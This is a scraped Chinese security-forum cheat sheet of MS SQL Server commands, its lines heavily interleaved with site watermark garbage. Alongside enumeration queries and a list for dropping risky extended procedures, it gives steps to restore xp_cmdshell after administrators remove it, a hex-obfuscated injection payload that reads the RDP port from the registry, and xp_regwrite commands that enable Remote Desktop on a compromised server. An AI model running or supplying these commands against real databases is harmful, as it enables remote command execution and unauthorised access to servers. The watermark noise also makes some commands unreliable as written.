      ==列出服务器所有本地组==
      ========================
      + U( v; ]5 X5 @% U
      execute master..xp_enumgroupsT00LS- z. a$ l+ V3 V  e$ s9 N$ b
      T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security8 d% `9 x" H" S+ v
      ======================
      ==获取MS SQL的版本号==T00LS7 o2 S6 y3 D" |, T$ Y1 {: `
      ======================

      execute master..sp_msgetversionT00LS- c8 R2 {7 `$ ^5 b* d8 |

      ========================================= - 低调求发展 - 老牌第三方民间网络安全交流平台! O; b0 Y' d, y6 s" n# U
      ==参数说明:目录名,目录深度,是否显示文件==
      =========================================

      execute master..xp_dirtree 'c:'
      execute master..xp_dirtree 'c:',1 - 低调求发展 - 老牌第三方民间网络安全交流平台6 A$ s( h; `0 e
      execute master..xp_dirtree 'c:',1,18 S( q8 S; s3 z% O8 d
      www.t00ls.net* X+ M6 ?& E* S) m/ ]  J
      =========================================
      ==列出服务器上安装的所有OLEDB提供的程序==
      =========================================
      www.t00ls.net4 b& U2 O8 X6 r4 `+ ^
      execute master..xp_enum_oledb_providerswww.t00ls.net' ?2 P& m0 q7 ~

      =========================
      ==列出服务器上配置的DNS==
      ========================= - 低调求发展 - 老牌第三方民间网络安全交流平台2 p% {$ B6 d* f1 N# E) u
      T00LS, d# h- z& c7 r/ s
      execute master..xp_enumdsn | 低调求发展 - 潜心习安全$ t( F% {1 J- ~) a9 o
      www.t00ls.net: {/ e3 l- n3 k& C" x( ^+ |
      删除存储过程 | 低调求发展 - 潜心习安全, {2 }+ P/ C3 K

      drop PROCEDURE sp_addextendedproc

      -----------------------T00LS3 w, Q3 H4 ~' u7 Y& z+ P( [; H
      --删除sql危险存储过程--
      -----------------------

      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
      DROP PROCEDURE sp_makewebtaskT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security9 ?  l; `, ], B# \' F
      exec master..sp_dropextendedproc xp_cmdshell
      exec master..sp_dropextendedproc xp_dirtree
      exec master..sp_dropextendedproc xp_fileexist
      exec master..sp_dropextendedproc xp_terminate_processwww.t00ls.net) L7 Y( @1 I' D- i2 ^
      exec master..sp_dropextendedproc sp_oamethod
      exec master..sp_dropextendedproc sp_oacreate
      exec master..sp_dropextendedproc xp_regaddmultistringwww.t00ls.net. ]# X# G# c+ p, d& M6 L& w
      exec master..sp_dropextendedproc xp_regdeletekey
      exec master..sp_dropextendedproc xp_regdeletevalue0 z& G( g, L5 i' D
      exec master..sp_dropextendedproc xp_regenumkeys
      exec master..sp_dropextendedproc xp_regenumvalues
      exec master..sp_dropextendedproc sp_add_jobT00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security7 [/ a$ C) |  |7 @2 c( T& U& m3 e. L+ A
      exec master..sp_dropextendedproc sp_addtask
      exec master..sp_dropextendedproc xp_regread
      exec master..sp_dropextendedproc xp_regwriteT00LS  O9 I/ M7 R" `0 h- x0 P7 D' c5 w
      exec master..sp_dropextendedproc xp_readwebtaskwww.t00ls.net9 q8 j& p/ I2 B  M  c1 e
      exec master..sp_dropextendedproc xp_makewebtask
      exec master..sp_dropextendedproc xp_regremovemultistringwww.t00ls.net- }) |8 m( P4 t" C( \/ U  L  c
      exec master..sp_dropextendedproc sp_OACreateT00LS, N, e6 u5 |2 G4 m; ~" U* u
      DROP PROCEDURE sp_addextendedproc - 低调求发展 - 老牌第三方民间网络安全交流平台) ~; ?4 r" J# h# x
      xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxT00LS2 p$ o  J: }6 P6 y
      xp_cmdshell新的恢复办法6 d7 S2 M4 Y- A0 q& L5 f4 K
      T00LS# ^% X/ f" T1 x3 [6 S# Q
      扩展储存过程被删除以后可以有很简单的办法恢复:
      删除 | 低调求发展 - 潜心习安全0 u9 B+ ], j' S0 ?, N& k
      drop procedure sp_addextendedprocT00LS* G- H, ~5 S' B
      drop procedure sp_oacreate
      exec sp_dropextendedproc 'xp_cmdshell'3 U4 V& j8 H7 ~
      - 低调求发展 - 老牌第三方民间网络安全交流平台4 Z5 A- l7 o" t. V
      恢复
      dbcc addextendedproc ("sp_oacreate","odsole70.dll")
      dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

      这样可以直接恢复,不用去管sp_addextendedproc是不是存在
      | 低调求发展 - 潜心习安全/ B. i  m% P7 D% S/ v
      -----------------------------( G. O6 `) K% i! k

      删除扩展存储过过程xp_cmdshell的语句:
      exec sp_dropextendedproc 'xp_cmdshell'

      恢复cmdshell的sql语句
      exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' - 低调求发展 - 老牌第三方民间网络安全交流平台+ l3 L- j5 {' l2 c

      T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security$ b* h  G( z3 Q3 t  B2 @( Z
      开启cmdshell的sql语句
      | 低调求发展 - 潜心习安全- B  }4 R8 f+ o) X, b8 G
      exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

      判断存储扩展是否存在
      select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'T00ls.Net - 低调求发展 - 潜心习安全 - Focus On Cyber Security! Q6 q9 |$ i* ?* k
      返回结果为1就okwww.t00ls.net2 [5 h+ r/ {; \- A
      - 低调求发展 - 老牌第三方民间网络安全交流平台4 q" I( b1 c; F1 S1 g/ d8 P8 o) [9 B* r
      恢复xp_cmdshell
      exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
      返回结果为1就okT00LS7 A% o; ^/ e; D5 g; e$ {0 A
      T00LS: }: v# m. L% x7 a
      否则上传xplog7.0.dll | 低调求发展 - 潜心习安全3 T6 a( k' ^( |1 g/ S, y( M
      exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll', j, |5 z$ v( b! K7 ^* i3 J3 B
      | 低调求发展 - 潜心习安全3 H- j+ v5 u# p9 t. u0 J! j
      堵上cmdshell的sql语句 | 低调求发展 - 潜心习安全; F0 p; R, B- \6 X; n+ X& U
      sp_dropextendedproc "xp_cmdshell - 低调求发展 - 老牌第三方民间网络安全交流平台, Y! J' Z$ E$ U: ?2 A. i5 g

      读3389端口
      regedit /e port.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" - 低调求发展 - 老牌第三方民间网络安全交流平台1 P9 j1 z! t5 y+ J5 G2 |0 h
      然后 type port.reg | find "PortNumber" | 低调求发展 - 潜心习安全1 K0 D0 [3 ]3 G3 {6 R
      sql 语句
      exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
      declare @s varchar(4000) set @s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227 as varchar(4000));exec(@s); --
      www.t00ls.net' x. }* _, ~7 |* i  C/ ~9 m
      1 R1 l) P( ^+ u+ v
      开启2003的终端(sa) | 低调求发展 - 潜心习安全* n- C4 y) }$ w; W$ h: U8 ?" A
      xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections','REG_DWORD','0'

      exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

      请登录之后再进行评论

      登录

      WordPress后台-外观-小工具 进行配置小工具

    • 做任务
    • 实时动态
    • 偏好设置
    • 帖子间隔 侧栏位置: